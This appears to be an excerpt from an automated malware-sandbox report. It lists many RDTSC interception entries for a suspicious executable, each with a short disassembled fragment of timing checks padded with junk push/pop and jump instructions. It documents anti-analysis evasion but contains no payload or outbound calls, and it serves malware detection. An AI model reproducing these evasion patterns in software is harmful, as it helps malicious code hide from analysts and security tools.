Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A21D0E second address: A21D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F9153F87Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A22753 second address: A22759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A22759 second address: A22763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F9153F876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A22763 second address: A227B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E32h 0x00000007 jmp 00007F7F91348E2Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F7F91348E37h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007F7F91348E26h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A227B2 second address: A227B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A227B8 second address: A227C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A22D55 second address: A22D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F7F9153F876h 0x0000000d jo 00007F7F9153F876h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2384D second address: A23868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F7F91348E28h 0x0000000d push edi 0x0000000e push edx 0x0000000f jnp 00007F7F91348E26h 0x00000015 pop edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A27557 second address: A27573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F7F9153F87Eh 0x0000000c jnc 00007F7F9153F876h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F7F9153F876h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2EBF4 second address: A2EC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7F91348E26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F7F91348E26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2EC07 second address: A2EC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2EEDD second address: A2EEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2EEE7 second address: A2EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2EEEC second address: A2EEF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2EEF4 second address: A2EF10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F888h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F06D second address: A2F072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F072 second address: A2F08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F7F9153F876h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F7F9153F87Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F08D second address: A2F0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F7F91348E39h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F215 second address: A2F21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F64F second address: A2F655 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F655 second address: A2F660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7F9153F876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F660 second address: A2F669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F7A8 second address: A2F7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F7AE second address: A2F7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A2F7B4 second address: A2F7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A37118 second address: A37123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A37123 second address: A37127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A37653 second address: A37657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A37A74 second address: A37A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F7F9153F87Eh 0x0000000e popad 0x0000000f push ecx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A37A94 second address: A37A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A37A9A second address: A37A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A37F07 second address: A37F34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7F91348E26h 0x00000009 jng 00007F7F91348E26h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7F91348E39h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A3861C second address: A3862D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F9153F87Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A3862D second address: A38631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A38DA4 second address: A38DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F7F9153F876h 0x00000012 jno 00007F7F9153F876h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A38DC4 second address: A38DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F91348E2Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A38DD7 second address: A38DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A3EB4E second address: A3EB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A3EB54 second address: A3EB71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F887h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A3EB71 second address: A3EB76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A3EB76 second address: A3EB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F9153F876h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A3E869 second address: A3E876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F7F91348E26h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A454C9 second address: A454DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F9153F87Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A52271 second address: A5228D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007F7F91348E2Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A57E3F second address: A57E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F9153F876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A57E49 second address: A57E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A57E4D second address: A57E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F7F9153F87Dh 0x0000000c jmp 00007F7F9153F882h 0x00000011 pop edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jg 00007F7F9153F876h 0x0000001b jmp 00007F7F9153F881h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 popad 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A57E97 second address: A57E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A5E16D second address: A5E171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A6115C second address: A61162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A61162 second address: A61175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7F9153F87Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A6100D second address: A61025 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F7F91348E26h 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 jne 00007F7F91348E26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A65CCD second address: A65CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A65CD3 second address: A65CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7F91348E26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A6884E second address: A6885D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F9153F87Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A6885D second address: A68873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E32h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A6E45A second address: A6E45F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A6EA30 second address: A6EA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A6F807 second address: A6F833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7F9153F880h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F7F9153F87Eh 0x00000015 pushad 0x00000016 popad 0x00000017 jbe 00007F7F9153F876h 0x0000001d push edi 0x0000001e push edi 0x0000001f pop edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A73651 second address: A73657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A73657 second address: A73678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7F9153F882h 0x0000000c jns 00007F7F9153F876h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A731D7 second address: A731E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A731E2 second address: A731E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A76F2A second address: A76F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F91348E2Fh 0x00000009 jno 00007F7F91348E26h 0x0000000f jmp 00007F7F91348E2Eh 0x00000014 popad 0x00000015 push ecx 0x00000016 jmp 00007F7F91348E32h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A76F69 second address: A76F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A7A0E1 second address: A7A0E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A81855 second address: A8185F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A8D4A5 second address: A8D4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7F91348E26h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F7F91348E26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A90F40 second address: A90F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F7F9153F87Ch 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F7F9153F884h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F7F9153F876h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A969E7 second address: A969FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7F91348E30h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A969FE second address: A96A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A96A02 second address: A96A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A96A08 second address: A96A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F7F9153F87Dh 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7F9153F87Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A96E4B second address: A96E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F7F91348E2Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A96E5F second address: A96E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A97719 second address: A97739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F7F91348E39h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A97739 second address: A9778B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F9153F87Ch 0x00000008 jbe 00007F7F9153F876h 0x0000000e jmp 00007F7F9153F881h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jne 00007F7F9153F8A6h 0x0000001b jnl 00007F7F9153F892h 0x00000021 pushad 0x00000022 jne 00007F7F9153F876h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9AAEF second address: A9AAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9ACC2 second address: A9ACC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9B028 second address: A9B03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9B03B second address: A9B062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 movsx edx, bx 0x0000000a push dword ptr [ebp+122D22C5h] 0x00000010 sub dword ptr [ebp+122D1A8Ah], ecx 0x00000016 push E25A9106h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7F9153F87Ah 0x00000022 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9DC1E second address: A9DC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9DC23 second address: A9DC3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7F9153F883h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9DC3C second address: A9DC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9DC40 second address: A9DC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7F9153F87Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: A9FD3B second address: A9FD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA0357 second address: 4DA035B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA035B second address: 4DA036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
